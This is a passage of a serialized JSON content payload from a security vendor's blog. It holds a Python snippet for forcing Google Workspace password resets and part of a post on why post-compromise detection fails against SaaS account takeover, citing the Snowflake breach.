69990,"marks":169991,"value":155919,"nodeType":173},{},[],{"data":169993,"content":169994,"nodeType":178},{},[169995,169998,170005],{"data":169996,"marks":169997,"value":155926,"nodeType":173},{},[],{"data":169999,"content":170000,"nodeType":186},{"uri":9099},[170001],{"data":170002,"marks":170003,"value":155934,"nodeType":173},{},[170004],{"type":194},{"data":170006,"marks":170007,"value":155938,"nodeType":173},{},[],{"data":170009,"content":170010,"nodeType":231},{},[],{"data":170012,"content":170013,"nodeType":169},{},[170014],{"data":170015,"marks":170016,"value":155948,"nodeType":173},{},[],{"data":170018,"content":170019,"nodeType":178},{},[170020],{"data":170021,"marks":170022,"value":155955,"nodeType":173},{},[],{"data":170024,"content":170027,"nodeType":312},{"target":170025},{"sys":170026},{"id":155960,"type":317,"linkType":318},[],{"data":170029,"content":170030,"nodeType":178},{},[170031],{"data":170032,"marks":170033,"value":37,"nodeType":173},{},[],{"entries":170035},{"hyperlink":170036,"inline":170037,"block":170038},[],[],[170039,170042,170050,170055],{"sys":170040,"__typename":15269,"type":15270,"ctaText":170041,"buttonLabel":134264,"buttonColour":72847,"buttonUrl":125749},{"id":155826},"Learn more about our verified stolen credential detection feature",{"sys":170043,"__typename":5345,"title":170044,"caption":170045,"layoutMode":118,"file":170046},{"id":155865},"Automating Password resets with Push","Automating password resets using Push",{"url":170047,"width":170048,"height":170049},"https://images.ctfassets.net/y1cdw1ablpvd/3xEHX60bfsoM8oC88L5bXs/bd2567087156edcb849ec2dd6286559e/Automating_password_resets__3_.png",3070,1358,{"sys":170051,"__typename":134274,"name":170052,"type":170053,"syntax":170054},{"id":155878},"Automating password resets code snippet","python","import json\nfrom google.oauth2 import service_account\nfrom googleapiclient.discovery import build\n\n\ndef ssoPasswordReset(event):\n    # extract email from message\n    email_address = event[\"email\"]\n\n    # GWS service account credentials\n    gws_service_account_credentials = \"xxx\"\n\n    SCOPES = [\"https://www.googleapis.com/auth/admin.directory.user\"]\n\n    # Google requires us to associate this activity to a user account\n    DELEGATED_ADMIN_EMAIL = \"user@domain.com\"\n\n    credentials = service_account.Credentials.from_service_account_info(json.loads(gws_service_account_credentials), \n    scopes=SCOPES).with_subject(DELEGATED_ADMIN_EMAIL)\n\n    service = build(\"admin\", \"directory_v1\", credentials=credentials)\n\n    # Set changePasswordAtNextLogin on the account\n    service.users().update(userKey=email_address, body={\"changePasswordAtNextLogin\": True}).execute()\n",{"sys":170056,"__typename":15269,"type":112637,"ctaText":170057,"buttonLabel":170058,"buttonColour":15273,"buttonUrl":118},{"id":155960},"Book a demo to see how Push stops account takeover","Book demo","content:blog:automating-sso-password-resets-using-push.json","blog/automating-sso-password-resets-using-push.json","blog/automating-sso-password-resets-using-push",{"_path":170063,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":170064,"ogImage":118,"summary":170066,"title":157480,"subtitle":118,"metaTitle":170077,"synopsis":157481,"hashTags":118,"publishedDate":157482,"slug":157483,"tagsCollection":170078,"relatedBlogPostsCollection":170082,"authorsCollection":171816,"content":171820,"_id":173219,"_type":5439,"_source":5440,"_file":173220,"_stem":173221,"_extension":5439},"/blog/navigating-your-first-90-days-with-push",{"id":155988,"publishedAt":170065},"2024-12-09T16:15:38.472Z",{"json":170067},{"data":170068,"content":170069,"nodeType":165},{},[170070],{"data":170071,"content":170072,"nodeType":178},{},[170073],{"data":170074,"marks":170075,"value":170076,"nodeType":173},{},[],"Inspired by the classic 1980s video game Oregon Trail, we’ve put together the following guide for intrepid security teams who are traveling across potentially unknown territory as they uncover their identity attack surface and secure it against modern identity attacks.","What you can accomplish in your first 90 days with Push",{"items":170079},[170080],{"sys":170081,"name":26137},{"id":26136},{"items":170083},[170084,170698,171530],{"__typename":1528,"sys":170085,"content":170086,"title":46310,"synopsis":155637,"hashTags":118,"publishedDate":155638,"slug":46311,"tagsCollection":170688,"authorsCollection":170694},{"id":24713},{"json":170087},{"nodeType":165,"data":170088,"content":170089},{},[170090,170095,170098,170111,170117,170123,170128,170134,170150,170165,170171,170176,170182,170185,170191,170197,170203,170209,170215,170221,170250,170255,170261,170264,170270,170276,170374,170380,170396,170402,170418,170424,170441,170447,170463,170466,170472,170478,170484,170510,170516,170522,170537,170542,170548,170554,170559,170565,170622,170628,170634,170640,170646,170652,170655,170661,170677,170682],{"nodeType":312,"data":170091,"content":170094},{"target":170092},{"sys":170093},{"id":154952,"type":317,"linkType":318},[],{"nodeType":231,"data":170096,"content":170097},{},[],{"nodeType":178,"data":170099,"content":170100},{},[170101,170104,170108],{"nodeType":173,"value":154961,"marks":170102,"data":170103},[],{},{"nodeType":173,"value":154965,"marks":170105,"data":170107},[170106],{"type":1646},{},{"nodeType":173,"value":154970,"marks":170109,"data":170110},[],{},{"nodeType":178,"data":170112,"content":170113},{},[170114],{"nodeType":173,"value":154977,"marks":170115,"data":170116},[],{},{"nodeType":178,"data":170118,"content":170119},{},[170120],{"nodeType":173,"value":154984,"marks":170121,"data":170122},[],{},{"nodeType":312,"data":170124,"content":170127},{"target":170125},{"sys":170126},{"id":154991,"type":317,"linkType":318},[],{"nodeType":178,"data":170129,"content":170130},{},[170131],{"nodeType":173,"value":154997,"marks":170132,"data":170133},[],{},{"nodeType":3769,"data":170135,"content":170136},{},[170137],{"nodeType":178,"data":170138,"content":170139},{},[170140,170143,170147],{"nodeType":173,"value":155007,"marks":170141,"data":170142},[],{},{"nodeType":173,"value":155011,"marks":170144,"data":170146},[170145],{"type":370},{},{"nodeType":173,"value":2340,"marks":170148,"data":170149},[],{},{"nodeType":178,"data":170151,"content":170152},{},[170153,170156,170162],{"nodeType":173,"value":155022,"marks":170154,"data":170155},[],{},{"nodeType":186,"data":170157,"content":170158},{"uri":155027},[170159],{"nodeType":173,"value":155030,"marks":170160,"data":170161},[],{},{"nodeType":173,"value":155034,"marks":170163,"data":170164},[],{},{"nodeType":178,"data":170166,"content":170167},{},[170168],{"nodeType":173,"value":155041,"marks":170169,"data":170170},[],{},{"nodeType":312,"data":170172,"content":170175},{"target":170173},{"sys":170174},{"id":155048,"type":317,"linkType":318},[],{"nodeType":178,"data":170177,"content":170178},{},[170179],{"nodeType":173,"value":155054,"marks":170180,"data":170181},[],{},{"nodeType":231,"data":170183,"content":170184},{},[],{"nodeType":169,"data":170186,"content":170187},{},[170188],{"nodeType":173,"value":155064,"marks":170189,"data":170190},[],{},{"nodeType":178,"data":170192,"content":170193},{},[170194],{"nodeType":173,"value":155071,"marks":170195,"data":170196},[],{},{"nodeType":178,"data":170198,"content":170199},{},[170200],{"nodeType":173,"value":155078,"marks":170201,"data":170202},[],{},{"nodeType":235,"data":170204,"content":170205},{},[170206],{"nodeType":173,"value":155085,"marks":170207,"data":170208},[],{},{"nodeType":178,"data":170210,"content":170211},{},[170212],{"nodeType":173,"value":155092,"marks":170213,"data":170214},[],{},{"nodeType":178,"data":170216,"content":170217},{},[170218],{"nodeType":173,"value":155099,"marks":170219,"data":170220},[],{},{"nodeType":250,"data":170222,"content":170223},{},[170224,170237],{"nodeType":254,"data":170225,"content":170226},{},[170227],{"nodeType":178,"data":170228,"content":170229},{},[170230,170234],{"nodeType":173,"value":155112,"marks":170231,"data":170233},[170232],{"type":370},{},{"nodeType":173,"value":155117,"marks":170235,"data":170236},[],{},{"nodeType":254,"data":170238,"content":170239},{},[170240],{"nodeType":178,"data":170241,"content":170242},{},[170243,170247],{"nodeType":173,"value":155127,"marks":170244,"data":170246},[170245],{"type":370},{},{"nodeType":173,"value":155132,"marks":170248,"data":170249},[],{},{"nodeType":312,"data":170251,"content":170254},{"target":170252},{"sys":170253},{"id":155139,"type":317,"linkType":318},[],{"nodeType":178,"data":170256,"content":170257},{},[170258],{"nodeType":173,"value":155145,"marks":170259,"data":170260},[],{},{"nodeType":231,"data":170262,"content":170263},{},[],{"nodeType":169,"data":170265,"content":170266},{},[170267],{"nodeType":173,"value":155155,"marks":170268,"data":170269},[],{},{"nodeType":178,"data":170271,"content":170272},{},[170273],{"nodeType":173,"value":155162,"marks":170274,"data":170275},[],{},{"nodeType":250,"data":170277,"content":170278},{},[170279,170298,170317,170336,170365],{"nodeType":254,"data":170280,"content":170281},{},[170282],{"nodeType":178,"data":170283,"content":170284},{},[170285,170288,170295],{"nodeType":173,"value":5039,"marks":170286,"data":170287},[],{},{"nodeType":186,"data":170289,"content":170290},{"uri":125982},[170291],{"nodeType":173,"value":155181,"marks":170292,"data":170294},[170293],{"type":194},{},{"nodeType":173,"value":155186,"marks":170296,"data":170297},[],{},{"nodeType":254,"data":170299,"content":170300},{},[170301],{"nodeType":178,"data":170302,"content":170303},{},[170304,170307,170314],{"nodeType":173,"value":37,"marks":170305,"data":170306},[],{},{"nodeType":186,"data":170308,"content":170309},{"uri":155200},[170310],{"nodeType":173,"value":155203,"marks":170311,"data":170313},[170312],{"type":194},{},{"nodeType":173,"value":155208,"marks":170315,"data":170316},[],{},{"nodeType":254,"data":170318,"content":170319},{},[170320],{"nodeType":178,"data":170321,"content":170322},{},[170323,170326,170333],{"nodeType":173,"value":155218,"marks":170324,"data":170325},[],{},{"nodeType":186,"data":170327,"content":170328},{"uri":155223},[170329],{"nodeType":173,"value":155226,"marks":170330,"data":170332},[170331],{"type":194},{},{"nodeType":173,"value":155231,"marks":170334,"data":170335},[],{},{"nodeType":254,"data":170337,"content":170338},{},[170339],{"nodeType":178,"data":170340,"content":170341},{},[170342,170345,170352,170355,170362],{"nodeType":173,"value":155241,"marks":170343,"data":170344},[],{},{"nodeType":186,"data":170346,"content":170347},{"uri":155246},[170348],{"nodeType":173,"value":155249,"marks":170349,"data":170351},[170350],{"type":194},{},{"nodeType":173,"value":155254,"marks":170353,"data":170354},[],{},{"nodeType":186,"data":170356,"content":170357},{"uri":155259},[170358],{"nodeType":173,"value":155262,"marks":170359,"data":170361},[170360],{"type":194},{},{"nodeType":173,"value":155267,"marks":170363,"data":170364},[],{},{"nodeType":254,"data":170366,"content":170367},{},[170368],{"nodeType":178,"data":170369,"content":170370},{},[170371],{"nodeType":173,"value":155277,"marks":170372,"data":170373},[],{},{"nodeType":178,"data":170375,"content":170376},{},[170377],{"nodeType":173,"value":155284,"marks":170378,"data":170379},[],{},{"nodeType":178,"data":170381,"content":170382},{},[170383,170386,170393],{"nodeType":173,"value":37,"marks":170384,"data":170385},[],{},{"nodeType":186,"data":170387,"content":170388},{"uri":155200},[170389],{"nodeType":173,"value":155297,"marks":170390,"data":170392},[170391],{"type":194},{},{"nodeType":173,"value":155302,"marks":170394,"data":170395},[],{},{"nodeType":235,"data":170397,"content":170398},{},[170399],{"nodeType":173,"value":155309,"marks":170400,"data":170401},[],{},{"nodeType":178,"data":170403,"content":170404},{},[170405,170408,170415],{"nodeType":173,"value":155316,"marks":170406,"data":170407},[],{},{"nodeType":186,"data":170409,"content":170410},{"uri":126102},[170411],{"nodeType":173,"value":155323,"marks":170412,"data":170414},[170413],{"type":194},{},{"nodeType":173,"value":1477,"marks":170416,"data":170417},[],{},{"nodeType":178,"data":170419,"content":170420},{},[170421],{"nodeType":173,"value":155334,"marks":170422,"data":170423},[],{},{"nodeType":178,"data":170425,"content":170426},{},[170427,170430,170438],{"nodeType":173,"value":155341,"marks":170428,"data":170429},[],{},{"nodeType":186,"data":170431,"content":170432},{"uri":81621},[170433],{"nodeType":173,"value":155348,"marks":170434,"data":170437},[170435,170436],{"type":194},{"type":370},{},{"nodeType":173,"value":155354,"marks":170439,"data":170440},[],{},{"nodeType":178,"data":170442,"content":170443},{},[170444],{"nodeType":173,"value":155361,"marks":170445,"data":170446},[],{},{"nodeType":178,"data":170448,"content":170449},{},[170450,170453,170460],{"nodeType":173,"value":155368,"marks":170451,"data":170452},[],{},{"nodeType":186,"data":170454,"content":170455},{"uri":4492},[170456],{"nodeType":173,"value":111468,"marks":170457,"data":170459},[170458],{"type":194},{},{"nodeType":173,"value":155379,"marks":170461,"data":170462},[],{},{"nodeType":231,"data":170464,"content":170465},{},[],{"nodeType":169,"data":170467,"content":170468},{},[170469],{"nodeType":173,"value":155389,"marks":170470,"data":170471},[],{},{"nodeType":178,"data":170473,"content":170474},{},[170475],{"nodeType":173,"value":155396,"marks":170476,"data":170477},[],{},{"nodeType":178,"data":170479,"content":170480},{},[170481],{"nodeType":173,"value":155403,"marks":170482,"data":170483},[],{},{"nodeType":178,"data":170485,"content":170486},{},[170487,170490,170497,170500,170507],{"nodeType":173,"value":155410,"marks":170488,"data":170489},[],{},{"nodeType":186,"data":170491,"content":170492},{"uri":155415},[170493],{"nodeType":173,"value":155418,"marks":170494,"data":170496},[170495],{"type":194},{},{"nodeType":173,"value":155423,"marks":170498,"data":170499},[],{},{"nodeType":186,"data":170501,"content":170502},{"uri":111913},[170503],{"nodeType":173,"value":155430,"marks":170504,"data":170506},[170505],{"type":194},{},{"nodeType":173,"value":155435,"marks":170508,"data":170509},[],{},{"nodeType":178,"data":170511,"content":170512},{},[170513],{"nodeType":173,"value":155442,"marks":170514,"data":170515},[],{},{"nodeType":178,"data":170517,"content":170518},{},[170519],{"nodeType":173,"value":155449,"marks":170520,"data":170521},[],{},{"nodeType":178,"data":170523,"content":170524},{},[170525,170528,170534],{"nodeType":173,"value":155456,"marks":170526,"data":170527},[],{},{"nodeType":186,"data":170529,"content":170530},{"uri":819},[170531],{"nodeType":173,"value":155463,"marks":170532,"data":170533},[],{},{"nodeType":173,"value":155467,"marks":170535,"data":170536},[],{},{"nodeType":312,"data":170538,"content":170541},{"target":170539},{"sys":170540},{"id":155474,"type":317,"linkType":318},[],{"nodeType":235,"data":170543,"content":170544},{},[170545],{"nodeType":173,"value":155480,"marks":170546,"data":170547},[],{},{"nodeType":178,"data":170549,"content":170550},{},[170551],{"nodeType":173,"value":155487,"marks":170552,"data":170553},[],{},{"nodeType":312,"data":170555,"content":170558},{"target":170556},{"sys":170557},{"id":155494,"type":317,"linkType":318},[],{"nodeType":178,"data":170560,"content":170561},{},[170562],{"nodeType":173,"value":100610,"marks":170563,"data":170564},[],{},{"nodeType":250,"data":170566,"content":170567},{},[170568,170586,170595,170604,170613],{"nodeType":254,"data":170569,"content":170570},{},[170571],{"nodeType":178,"data":170572,"content":170573},{},[170574,170577,170583],{"nodeType":173,"value":155512,"marks":170575,"data":170576},[],{},{"nodeType":186,"data":170578,"content":170579},{"uri":155517},[170580],{"nodeType":173,"value":155030,"marks":170581,"data":170582},[],{},{"nodeType":173,"value":2340,"marks":170584,"data":170585},[],{},{"nodeType":254,"data":170587,"content":170588},{},[170589],{"nodeType":178,"data":170590,"content":170591},{},[170592],{"nodeType":173,"value":155532,"marks":170593,"data":170594},[],{},{"nodeType":254,"data":170596,"content":170597},{},[170598],{"nodeType":178,"data":170599,"content":170600},{},[170601],{"nodeType":173,"value":155542,"marks":170602,"data":170603},[],{},{"nodeType":254,"data":170605,"content":170606},{},[170607],{"nodeType":178,"data":170608,"content":170609},{},[170610],{"nodeType":173,"value":155552,"marks":170611,"data":170612},[],{},{"nodeType":254,"data":170614,"content":170615},{},[170616],{"nodeType":178,"data":170617,"content":170618},{},[170619],{"nodeType":173,"value":105070,"marks":170620,"data":170621},[],{},{"nodeType":178,"data":170623,"content":170624},{},[170625],{"nodeType":173,"value":155568,"marks":170626,"data":170627},[],{},{"nodeType":178,"data":170629,"content":170630},{},[170631],{"nodeType":173,"value":155575,"marks":170632,"data":170633},[],{},{"nodeType":235,"data":170635,"content":170636},{},[170637],{"nodeType":173,"value":155582,"marks":170638,"data":170639},[],{},{"nodeType":178,"data":170641,"content":170642},{},[170643],{"nodeType":173,"value":155589,"marks":170644,"data":170645},[],{},{"nodeType":178,"data":170647,"content":170648},{},[170649],{"nodeType":173,"value":155596,"marks":170650,"data":170651},[],{},{"nodeType":231,"data":170653,"content":170654},{},[],{"nodeType":169,"data":170656,"content":170657},{},[170658],{"nodeType":173,"value":155606,"marks":170659,"data":170660},[],{},{"nodeType":178,"data":170662,"content":170663},{},[170664,170667,170674],{"nodeType":173,"value":155613,"marks":170665,"data":170666},[],{},{"nodeType":186,"data":170668,"content":170669},{"uri":473},[170670],{"nodeType":173,"value":71815,"marks":170671,"data":170673},[170672],{"type":194},{},{"nodeType":173,"value":197,"marks":170675,"data":170676},[],{},{"nodeType":312,"data":170678,"content":170681},{"target":170679},{"sys":170680},{"id":4766,"type":317,"linkType":318},[],{"nodeType":178,"data":170683,"content":170684},{},[170685],{"nodeType":173,"value":37,"marks":170686,"data":170687},[],{},{"items":170689},[170690,170692],{"sys":170691,"name":18399},{"id":18398},{"sys":170693,"name":509},{"id":508},{"items":170695},[170696],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":170697},{"url":2911},{"__typename":1528,"sys":170699,"content":170701,"title":171516,"synopsis":171517,"hashTags":118,"publishedDate":171518,"slug":171519,"tagsCollection":171520,"authorsCollection":171526},{"id":170700},"4Bc6qX9kURetHcK7nkS8on",{"json":170702},{"nodeType":165,"data":170703,"content":170704},{},[170705,170712,170719,170726,170732,170739,170746,170752,170759,170765,170772,170780,170787,170792,170799,170830,170837,170844,170877,170885,170892,170900,170908,170915,170922,170941,170948,170955,170962,170970,170977,170984,171017,171024,171077,171084,171091,171099,171106,171113,171120,171128,171135,171158,171165,171213,171220,171226,171233,171276,171283,171291,171298,171305,171336,171344,171351,171357,171364,171370,171377,171383,171390,171470,171477,171484,171491,171509],{"nodeType":178,"data":170706,"content":170707},{},[170708],{"nodeType":173,"value":170709,"marks":170710,"data":170711},"As an industry, we’ve been conditioned to think about threat detection and response as something that happens post-compromise. Best practice has formed around resources like the Cyber Kill Chain and the MITRE ATT&CK Framework which focus on detecting indicators of an attacker presence on your network, and their behaviors and actions as they move through it.",[],{},{"nodeType":178,"data":170713,"content":170714},{},[170715],{"nodeType":173,"value":170716,"marks":170717,"data":170718},"But with the shift to identity attacks, where attackers look to take over accounts on internet-facing apps and services, relying on an assumed compromise approach to detection is becoming less reliable. The most significant breaches of the last 12-18 months have been the result of browser-based attacks where an attacker has taken over an account, exfiltrated data… and that’s it. ",[],{},{"nodeType":178,"data":170720,"content":170721},{},[170722],{"nodeType":173,"value":170723,"marks":170724,"data":170725},"This change means that the typical methods of post-compromise detection and response become much less viable. So, we’re going to talk a bit about what’s changed, why controls are failing, and what we’re doing here at Push to address the detection gaps. ",[],{},{"nodeType":312,"data":170727,"content":170731},{"target":170728},{"sys":170729},{"id":170730,"type":317,"linkType":318},"4179AY8ZEIJ3Ce9jszn4fA",[],{"nodeType":169,"data":170733,"content":170734},{},[170735],{"nodeType":173,"value":161803,"marks":170736,"data":170738},[170737],{"type":370},{},{"nodeType":178,"data":170740,"content":170741},{},[170742],{"nodeType":173,"value":170743,"marks":170744,"data":170745},"Over the previous decade the typical attack paths, and the controls that have formed around it, have become very familiar to SecOps teams. ",[],{},{"nodeType":312,"data":170747,"content":170751},{"target":170748},{"sys":170749},{"id":170750,"type":317,"linkType":318},"4AOzwBGuNkXXogyqy46ki5",[],{"nodeType":178,"data":170753,"content":170754},{},[170755],{"nodeType":173,"value":170756,"marks":170757,"data":170758},"Even with the more recent transition to enterprise cloud and hybrid networking, the broad offensive logic of “land and expand” remains. This has seen the typical view of a network-based attack path simply expand to add first enterprise cloud, and then SaaS to the picture. ",[],{},{"nodeType":312,"data":170760,"content":170764},{"target":170761},{"sys":170762},{"id":170763,"type":317,"linkType":318},"2J3s38YOVcMuJuTdryhERA",[],{"nodeType":178,"data":170766,"content":170767},{},[170768],{"nodeType":173,"value":170769,"marks":170770,"data":170771},"And while this sort of attack path is theoretically possible, what happens in reality looks quite different. ",[],{},{"nodeType":169,"data":170773,"content":170774},{},[170775],{"nodeType":173,"value":170776,"marks":170777,"data":170779},"The new world",[170778],{"type":370},{},{"nodeType":178,"data":170781,"content":170782},{},[170783],{"nodeType":173,"value":170784,"marks":170785,"data":170786},"Instead of needing to progress through the network, moving laterally, elevating privileges, etc. modern account takeover tends to take a much more direct approach. ",[],{},{"nodeType":312,"data":170788,"content":170791},{"target":170789},{"sys":170790},{"id":111813,"type":317,"linkType":318},[],{"nodeType":178,"data":170793,"content":170794},{},[170795],{"nodeType":173,"value":170796,"marks":170797,"data":170798},"It’s a common misconception that SaaS compromise typically comes after the traditional attack chain (a myth largely promoted by old-school consultancy providers, MSSPs, and managed SOC providers). There’s no need for an attacker looking to take over a SaaS account to target the network first – and many organizations today simply no longer have a network in the conventional sense.  ",[],{},{"nodeType":178,"data":170800,"content":170801},{},[170802,170806,170814,170818,170827],{"nodeType":173,"value":170803,"marks":170804,"data":170805},"This isn’t to say that there aren’t examples of longer SaaS compromises involving lateral movement from SaaS to SaaS, or SaaS to cloud (",[],{},{"nodeType":186,"data":170807,"content":170808},{"uri":88239},[170809],{"nodeType":173,"value":170810,"marks":170811,"data":170813},"we created a whole attack matrix demonstrating the art of the possible here",[170812],{"type":194},{},{"nodeType":173,"value":170815,"marks":170816,"data":170817},"). Equally, there are examples of very short and direct attacks in enterprise cloud environments leading to ransomware deployment (for example, ",[],{},{"nodeType":186,"data":170819,"content":170821},{"uri":170820},"https://www.bleepingcomputer.com/news/security/mgm-casinos-esxi-servers-allegedly-encrypted-in-ransomware-attack/",[170822],{"nodeType":173,"value":170823,"marks":170824,"data":170826},"Scattered Spider turning an initial account takeover in Okta into a full-scale VMware ESXi ransomware compromise",[170825],{"type":194},{},{"nodeType":173,"value":60235,"marks":170828,"data":170829},[],{},{"nodeType":178,"data":170831,"content":170832},{},[170833],{"nodeType":173,"value":170834,"marks":170835,"data":170836},"But statistically, the average network or enterprise cloud attack involves much more complex lateral movement, privilege escalation, and defense evasion than the average SaaS attack path. ",[],{},{"nodeType":178,"data":170838,"content":170839},{},[170840],{"nodeType":173,"value":170841,"marks":170842,"data":170843},"The Snowflake attack path is a useful case study here: ",[],{},{"nodeType":250,"data":170845,"content":170846},{},[170847,170857,170867],{"nodeType":254,"data":170848,"content":170849},{},[170850],{"nodeType":178,"data":170851,"content":170852},{},[170853],{"nodeType":173,"value":170854,"marks":170855,"data":170856},"Attackers logged into the Snowflake tenant of ~165 organizations using stolen credentials to access user accounts via the web-based ‘SnowSight’ portal. ",[],{},{"nodeType":254,"data":170858,"content":170859},{},[170860],{"nodeType":178,"data":170861,"content":170862},{},[170863],{"nodeType":173,"value":170864,"marks":170865,"data":170866},"To take advantage of the many exposed accounts, the attacker created a utility performing account takeover and recon at-scale. ",[],{},{"nodeType":254,"data":170868,"content":170869},{},[170870],{"nodeType":178,"data":170871,"content":170872},{},[170873],{"nodeType":173,"value":170874,"marks":170875,"data":170876},"The attack finished with the attacker executing the same set of SQL commands across customer instances to stage and exfiltrate data. ",[],{},{"nodeType":178,"data":170878,"content":170879},{},[170880],{"nodeType":173,"value":170881,"marks":170882,"data":170884},"And that’s it. ",[170883],{"type":370},{},{"nodeType":178,"data":170886,"content":170887},{},[170888],{"nodeType":173,"value":170889,"marks":170890,"data":170891},"Since these attacks happen in-app, to be able to detect and intercept them you’d need deep app-level telemetry, and probably the ability to automate any containment and response activities. But unfortunately…",[],{},{"nodeType":169,"data":170893,"content":170894},{},[170895],{"nodeType":173,"value":170896,"marks":170897,"data":170899},"Detecting and responding after account takeover is really, really difficult",[170898],{"type":370},{},{"nodeType":235,"data":170901,"content":170902},{},[170903],{"nodeType":173,"value":170904,"marks":170905,"data":170907},"Limited log data ",[170906],{"type":370},{},{"nodeType":178,"data":170909,"content":170910},{},[170911],{"nodeType":173,"value":170912,"marks":170913,"data":170914},"The first challenge is that in-app malicious activity is mostly indistinguishable from legitimate user behavior. Even mass data exfiltration might appear legitimate depending on what the app is used for!",[],{},{"nodeType":178,"data":170916,"content":170917},{},[170918],{"nodeType":173,"value":170919,"marks":170920,"data":170921},"To meaningfully detect malicious activity in-app, for starters you would need visibility of user behavior and actions. Unfortunately, you don’t have this. ",[],{},{"nodeType":178,"data":170923,"content":170924},{},[170925,170929,170937],{"nodeType":173,"value":170926,"marks":170927,"data":170928},"We’ve previously discussed in detail why ",[],{},{"nodeType":186,"data":170930,"content":170931},{"uri":75099},[170932],{"nodeType":173,"value":170933,"marks":170934,"data":170936},"log sources like network (web proxy), IdP, and app logs fall short",[170935],{"type":194},{},{"nodeType":173,"value":170938,"marks":170939,"data":170940}," when it comes to identity attacks, but the TL;DR is that most applications provide extremely limited security logging (if they provide it at all). ",[],{},{"nodeType":178,"data":170942,"content":170943},{},[170944],{"nodeType":173,"value":170945,"marks":170946,"data":170947},"When logs are available, you’re limited to the events that the third-party deems suitable to log. Out of the 100 most popular apps we see across our customers, and perhaps the few dozen or so that are security critical, only a small handful provide any useful logging. So extremely risky actions, like cloning a private GitHub repo, or downloading SharePoint files via ‘open in app’ or file syncing, don’t generate any logs at all. ",[],{},{"nodeType":178,"data":170949,"content":170950},{},[170951],{"nodeType":173,"value":170952,"marks":170953,"data":170954},"Further, the lack of out-of-the-box connectors for many apps means that complex custom architectures are often required for ingestion.",[],{},{"nodeType":178,"data":170956,"content":170957},{},[170958],{"nodeType":173,"value":170959,"marks":170960,"data":170961},"So, even if logs are available and you’re able to ingest them into your SIEM, there’s no guarantee that the telemetry available will contribute to any meaningful detection of malicious activity. ",[],{},{"nodeType":235,"data":170963,"content":170964},{},[170965],{"nodeType":173,"value":170966,"marks":170967,"data":170969},"Limited response capabilities",[170968],{"type":370},{},{"nodeType":178,"data":170971,"content":170972},{},[170973],{"nodeType":173,"value":170974,"marks":170975,"data":170976},"By some miracle, you’ve detected an account takeover. Now what?",[],{},{"nodeType":178,"data":170978,"content":170979},{},[170980],{"nodeType":173,"value":170981,"marks":170982,"data":170983},"The ability to respond to an attack is dictated by the controls that are available to the security team. Unfortunately:",[],{},{"nodeType":250,"data":170985,"content":170986},{},[170987,170997,171007],{"nodeType":254,"data":170988,"content":170989},{},[170990],{"nodeType":178,"data":170991,"content":170992},{},[170993],{"nodeType":173,"value":170994,"marks":170995,"data":170996},"Depending on the app and how it was adopted, there’s no guarantee that you have admin rights. ",[],{},{"nodeType":254,"data":170998,"content":170999},{},[171000],{"nodeType":178,"data":171001,"content":171002},{},[171003],{"nodeType":173,"value":171004,"marks":171005,"data":171006},"It’s not guaranteed that admins will have the required security features available to them, like forcing a logout on a session or disabling an account (you may not even know who the users and admins are within your organization, particularly if it was self-adopted by a specific team). ",[],{},{"nodeType":254,"data":171008,"content":171009},{},[171010],{"nodeType":178,"data":171011,"content":171012},{},[171013],{"nodeType":173,"value":171014,"marks":171015,"data":171016},"Response probably requires that you log into the app and perform these actions in the admin interface (rather than being something you can orchestrate via SIEM workflow or API).",[],{},{"nodeType":178,"data":171018,"content":171019},{},[171020],{"nodeType":173,"value":171021,"marks":171022,"data":171023},"So at the point that the SecOps team is engaged, the team needs to be able to respond by eradicating the attacker’s access and closing the vulnerabilities exploited to prevent re-entry. To do this, the team needs to be able to identify, for example:",[],{},{"nodeType":250,"data":171025,"content":171026},{},[171027,171037,171047,171057,171067],{"nodeType":254,"data":171028,"content":171029},{},[171030],{"nodeType":178,"data":171031,"content":171032},{},[171033],{"nodeType":173,"value":171034,"marks":171035,"data":171036},"How the attacker gained access to the account",[],{},{"nodeType":254,"data":171038,"content":171039},{},[171040],{"nodeType":178,"data":171041,"content":171042},{},[171043],{"nodeType":173,"value":171044,"marks":171045,"data":171046},"What the attacker did using the compromised account",[],{},{"nodeType":254,"data":171048,"content":171049},{},[171050],{"nodeType":178,"data":171051,"content":171052},{},[171053],{"nodeType":173,"value":171054,"marks":171055,"data":171056},"Whether any alternative access methods were established (e.g. backup emails, API keys, or OAuth integrations)",[],{},{"nodeType":254,"data":171058,"content":171059},{},[171060],{"nodeType":178,"data":171061,"content":171062},{},[171063],{"nodeType":173,"value":171064,"marks":171065,"data":171066},"Where the attacker could have laterally moved to using the account (based on the integrations and permissions of the identity)",[],{},{"nodeType":254,"data":171068,"content":171069},{},[171070],{"nodeType":178,"data":171071,"content":171072},{},[171073],{"nodeType":173,"value":171074,"marks":171075,"data":171076},"Other accounts the attacker could also access using the same credentials",[],{},{"nodeType":178,"data":171078,"content":171079},{},[171080],{"nodeType":173,"value":171081,"marks":171082,"data":171083},"Given the limited tools available and the probable lack of app-specific knowledge (you can’t be an expert in every app!), by the time you’ve managed to respond, the attacker has probably already sailed off into the sunset with all of the data they can lay their hands on. ",[],{},{"nodeType":178,"data":171085,"content":171086},{},[171087],{"nodeType":173,"value":171088,"marks":171089,"data":171090},"Clearly, post-compromise detection and response isn’t really a viable option – you’re basically entering full response and recovery mode at this point. ",[],{},{"nodeType":169,"data":171092,"content":171093},{},[171094],{"nodeType":173,"value":171095,"marks":171096,"data":171098},"Shifting detection left",[171097],{"type":370},{},{"nodeType":178,"data":171100,"content":171101},{},[171102],{"nodeType":173,"value":171103,"marks":171104,"data":171105},"If you can’t reasonably detect and respond to post-compromise activity, it makes detecting and blocking initial access much more important. ",[],{},{"nodeType":178,"data":171107,"content":171108},{},[171109],{"nodeType":173,"value":171110,"marks":171111,"data":171112},"Again, it seems obvious, but it’s yet another notion that’s fallen under the radar – despite the trendiness of ‘shifting left’ in other areas like software development and vulnerability management. Partly because as we’ve discussed, post-compromise detection and response has been the norm for so long. But also because we’ve accepted the status quo of the (somewhat disappointing) preventative controls that are available. ",[],{},{"nodeType":178,"data":171114,"content":171115},{},[171116],{"nodeType":173,"value":171117,"marks":171118,"data":171119},"First, let’s isolate the techniques and steps that attackers typically rely on for account takeover. ",[],{},{"nodeType":235,"data":171121,"content":171122},{},[171123],{"nodeType":173,"value":171124,"marks":171125,"data":171127},"Methods of account takeover",[171126],{"type":370},{},{"nodeType":178,"data":171129,"content":171130},{},[171131],{"nodeType":173,"value":171132,"marks":171133,"data":171134},"To be able to hijack an account, an attacker needs to possess one of two 